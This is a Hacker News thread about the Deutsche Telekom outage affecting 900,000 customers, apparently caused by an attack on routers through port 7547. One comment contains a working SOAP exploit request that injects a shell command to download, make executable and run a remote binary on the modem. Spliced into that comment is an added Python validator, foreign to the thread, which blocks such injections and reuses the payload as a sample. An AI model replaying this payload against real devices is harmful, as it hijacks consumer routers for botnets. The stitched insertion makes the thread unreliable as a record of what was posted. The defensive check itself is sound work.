
Deutsche Telekom says 900k fixed-line customers suffer outages - Bouncingsoul1
http://in.reuters.com/article/deutsche-telekom-outages-idINL8N1DT1FV
======
raesene6
So from
[https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execut...](https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759)

\- this appears to be an attack on an externally visible port (7547)

\- There is publicly available exploit code for this issue
([https://www.exploit-db.com/exploits/40740/](https://www.exploit-db.com/exploits/40740/))

\- There are at least 41 Million hosts on the Internet with that port open.

Sounds like quite a few people are going to have a bad time over this, and I'm
left once again shaking my head at how someone ships an Internet facing
consumer device with an open port by default.....

~~~
atesti
I see that the exploit sets an ntp-server with shell code in backticks. ok.
But imagine the router did not have this exploit: Why on earth can anybody
connect to that port and configure the NTP server? How is authentication for
TR69 supposed to work??

~~~
mgliwka
The original disclosure from kenzo2017 covers this:
[https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-...](https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/)

 _When Eir’s technical support want to manage the modem – maybe to reset the
Wi-Fi password, they instruct the ACS (Access Control Server – the server used
to manage the modems) to connect to the modem on port 7547 and send it a
“connection request” command. The modem then connects to the ACS and Eir’s
technical support can change whatever settings they want._

------
martinald
The level of attacks seems definitely to be ramping up.

I think the main reason for this jump has been the fact attackers are starting
to make significant money out of these attacks now - especially now they can
accept funds easily via Bitcoin. Before I think attacks were mainly for the
lulz or very sophisticated attackers with various goals, but there must be
hundreds of millions of dollars in ransoms being paid out now.

Nearly anyone can now start making very good money with some simple tools. And
like any business people start innovating a lot quicker with a profit motive.

------
B3D4
    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7547
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 526

    <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...

next version step Mirai?

[https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...](https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e488b84e07959472ed05755548efec90df82701e/analysis/1480335565/)
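
The request above, together with atesti's question higher up in the thread (why a value that is supposed to be a hostname can reach a shell at all), is the subject of the following added example. It is not code from this thread, from the ISC diary or from any modem vendor; the request bodies it checks are constructed here, and `pool.ntp.org`, `192.0.2.10` and `l.ocal.host` are sample values. It parses the TR-064 `SetNTPServers` body, reports which `NewNTPServerN` slot carries shell metacharacters, and applies the IP-or-hostname allow-list that would have rejected the payload before it was ever passed to a shell:

```python
"""Defensive check for TR-064 SetNTPServers requests arriving on port 7547.

Added example, not code from this thread, the ISC diary or any modem vendor.
It parses the SOAP body of a SetNTPServers call, reports which NewNTPServerN
slots carry shell metacharacters (the injection pattern quoted above), and
applies the allow-list validation a hostname field should pass before the
value is handed to anything like a shell. Sample requests are constructed.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET

TIME_NS = "urn:dslforum-org:service:Time:1"  # service URN used by the payload

# Characters a shell uses to chain or substitute commands. None of them can
# appear in a valid hostname or IP literal, so their presence is a signal.
SHELL_META = set("`$;|&<>(){}'\"\\ \t\r\n")

# RFC 1123 hostname: dot-separated labels of 1-63 alphanumerics/hyphens,
# no label starting or ending with a hyphen, at most 253 characters total.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(rf"^(?=.{{1,253}}$)(?:{LABEL}\.)*{LABEL}$")


def is_valid_ntp_server(value):
    """Allow-list check: an empty (unused) slot, an IP literal, or a hostname."""
    if value == "":
        return True
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None


def parse_ntp_servers(body):
    """Return {slot_name: value} for a SetNTPServers body, or None when the
    envelope carries some other action. Raises ET.ParseError on bad XML."""
    root = ET.fromstring(body)
    action = root.find(f".//{{{TIME_NS}}}SetNTPServers")
    if action is None:
        return None
    # The NewNTPServerN children are unprefixed and no default namespace is
    # declared, so ElementTree reports their tags as bare names.
    return {child.tag: (child.text or "").strip() for child in action}


def inspect_request(body):
    """Classify one request body.

    Returns ("block", [offending slots]) when any slot contains shell
    metacharacters or fails the hostname/IP allow-list, ("allow", []) when
    every slot is clean or the action is not SetNTPServers, and
    ("block", ["malformed-xml"]) when the body does not parse at all.
    """
    try:
        slots = parse_ntp_servers(body)
    except ET.ParseError:
        return "block", ["malformed-xml"]
    if slots is None:
        return "allow", []
    bad = [name for name, value in slots.items()
           if SHELL_META & set(value) or not is_valid_ntp_server(value)]
    return ("block", bad) if bad else ("allow", [])


def soap_body(servers):
    """Build a SetNTPServers envelope in the shape quoted above (constructed)."""
    slots = "".join(f"<NewNTPServer{i}>{v}</NewNTPServer{i}>"
                    for i, v in enumerate(servers, start=1))
    return (
        '<?xml version="1.0"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
        'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<SOAP-ENV:Body><u:SetNTPServers xmlns:u="{TIME_NS}">{slots}'
        '</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>'
    )


# Constructed samples: a legitimate ACS-style call and one carrying the injection.
BENIGN = soap_body(["pool.ntp.org", "192.0.2.10", "", "", ""])
INJECTED = soap_body(["`cd /tmp;wget http://l.ocal.host/2`", "", "", "", ""])

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("injected", INJECTED)):
        verdict, slots = inspect_request(body)
        print(f"{label}: {verdict} {slots}")
```

Run as a script it prints a verdict for both samples. The same `inspect_request` can be pointed at bodies pulled from a capture of port-7547 traffic to count injection attempts per source, and `is_valid_ntp_server` is the server-side check a CPE should apply regardless of whether the caller was authenticated: a hostname field has no legitimate use for backticks or semicolons, so rejecting them costs nothing.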

~~~
mschuster91
What is this? A TR 069 exploit?!

~~~
B3D4
[https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code...](https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759/)

~~~
mschuster91
Thanks.

Jeez, I hate Telekom routers. They're unstable pieces of crap (except the
rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT
support, these dungheap devices caused most of the problems.

------
Aaargh20318
Anyone else who thinks 900k routers, running 900k identical firmware versions,
with 900k identical copies of any exploitable bugs, running on a predictable
IP range might be a bit of a problem, from a security PoV?

I wish ISPs stopped providing routers with their connections, if only to
prevent this kind of dangerous monoculture.

~~~
Jdam
900k devices is a monoculture, really? What about the billions of Windows &
Linux powered devices out there? I bet with a Linux 0day, you can exploit 10s
of billions of devices out there, including routers.

~~~
Aaargh20318
> What about the billions of Windows & Linux powered devices out there?

What about them? Do they all have routable IPs or are they behind one of
these cheap-ass routers?

~~~
Jdam
I guess forcing a heterogeneous router landscape to mitigate attack risks is
called security through obscurity.

------
noir_lord
What's scary about this is I have 100Mbps fiber at home.

At some point 900,000 routers with 100Mbps fiber might be a realistic user
base; that would be a tremendous amount of traffic to smack people with, and
that's without considering amplification attacks and such.

That's assuming a volumetric attack; even just "request foo.co.uk every half
second" would be catastrophic: 1.8 million requests per second would be a bit
of a bugger to handle.

~~~
dx034
It's probably still 100Mbps download. Upload is much lower (10Mbps perhaps?)
and the attack volume is determined by that.

I guess ISP specific attacks (with ISP specific boxes) wouldn't be that much
of an issue as the ISP could be blocked. Will deny service to all users there,
but the fault is clearly with the ISP, so they have to fix it. It's much more
problematic if a generic router that's being used across the globe has a
vulnerability. Filtering traffic will be much harder and ISPs will deny
responsibility as it's not due to their machines.

~~~
iamzenitraM
OVH recently received a 150gbps DDoS from the biggest ISP in Spain
(Telefonica) not long after they deployed symmetric 300mbps to almost all of
their domestic customers at a decent price - OVH had to divert traffic over
two different routes to be able to even _filter_ all of the incoming traffic.

[https://forum.ovh.es/showthread.php?14451-Informaci%F3n-rela...](https://forum.ovh.es/showthread.php?14451-Informaci%F3n-relativa-a-los-problemas-de-conexi%F3n-hacia-los-servicios-de-OVH) (use Google Translate)

As those connections spread (and they will - if you have optic fiber coverage,
the slowest you can get is symmetric 50mbps), things will only get funnier.

------
kriro
I also remember reports that 110 and 112 calls (German emergency numbers) were
down for four hours in some county recently due to technical issues on DT's
part. I never saw an explanation of what the exact cause was. Fire services and
police handled it decently (IIRC, stuff got routed to the next city and they
increased patrol cars). Still a bit alarming that there's no failover in
place and these numbers basically rely on one company (probably rooted in the
fact that DT used to be state owned and is thus still implicitly trusted?).

------
fahrradflucht
"Based on the error pattern, we cannot exclude the possibility that the
routers have been targeted by external parties with the result that they can
no longer register on the network." [0]

[0] [https://www.telekom.com/en/media/media-information/archive/i...](https://www.telekom.com/en/media/media-information/archive/information-on-current-problems-444862) (this should be
the thread's link in my opinion)

~~~
heisenbit
Telekom is the old national fixed line carrier with millions of customers. As
they run the copper plant, most of the DSL carrier modems are operated by them
- there are some other carriers renting and reselling. They sell and rent
customer DSL modems. One is also able to connect third party modems. Looks
like modems of their main brand "Speedport" are affected. The Telekom link is
the official company statement; however, it lacks details. More technical details
can be found at Heise:

[https://www.heise.de/newsticker/meldung/Grossstoerung-bei-de...](https://www.heise.de/newsticker/meldung/Grossstoerung-bei-der-Telekom-Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html)

[https://translate.google.com/translate?sl=de&tl=en&js=y&prev...](https://translate.google.com/translate?sl=de&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=https%3A%2F%2Fwww.heise.de%2Fnewsticker%2Fmeldung%2FGrossstoerung-bei-der-Telekom-Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html&edit-text=)

------
aluhut
> If problems persisted Deutsche Telekom suggested customers disconnect their
> routers from the network

Actually they suggest you disconnect the router, wait a few seconds and then
reconnect it.

It's fixed now according to them.

[https://www.heise.de/newsticker/meldung/Grossstoerung-bei-de...](https://www.heise.de/newsticker/meldung/Grossstoerung-bei-der-Telekom-Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html)

------
mgliwka
The original disclosure of the vulnerability is also an interesting read:
[https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-...](https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/)

------
aibottle
This is what you get for dumb and needless centralization of infrastructure
inside a capitalistic system, which does not at all incentivize maintenance
and providing security!

------
mcrae

      and it could not rule out "targeted external factors" as the reason
    

Yes, and DT could also not rule out extra-terrestrial interference. But who
cares?

It seems any large-scale enterprise incident is blamed on some other nebulous
third party these days (Russia, 400 lb men in their beds..) in order to shift
blame elsewhere.

Does the general public see through this?

~~~
throwbsidbdk
Companies have always shifted blame. I think there's just less disadvantage to
admitting you were hacked than there used to be.

Companies used to keep that stuff under wraps to avoid looking weak, but it's
so common now that it doesn't really hurt your brand to say it.

The truth will come out pretty quickly; anyone doing transit or peering can
see any attack happen.

~~~
aluhut
> I think there's just less disadvantage to admitting you were hacked than
> there used to be.

Is there any data that would support this claim?

I just don't believe it. This is the worse version of a technical failure.
Admitting a technical failure would therefore be automatically better than a
hack.

~~~
Lewton
> This is the worse version of a technical failure. Admitting a technical
> failure would therefore be automatically better than a hack.

I really doubt that's the way the general public views this (and they're the
ones that matter when it comes to what companies are willing to admit)

If they say they had a technical error the perception would be that it's their
fault.

If they say that they've been hacked the perception would be that it's because
someone else did something bad, so they're the victims.

I think this is terrible, but I fear that it's the truth.

~~~
aluhut
Actually most of the "general public" complain about the router. The rest
complain about the general incompetence of the former government institution
that failed them again (20 years of them going public recently. Was a huge scam
for the "general public"). But of course, there is still the Querfront
faction who doesn't want this to be just another Russia hack.

If you came up to them and gave them a technical reason they don't even
understand, it couldn't be worse. This is Germany here. People do have a
genetically built-in respect for people who talk a version of the language
they don't comprehend, since they must be an authority.

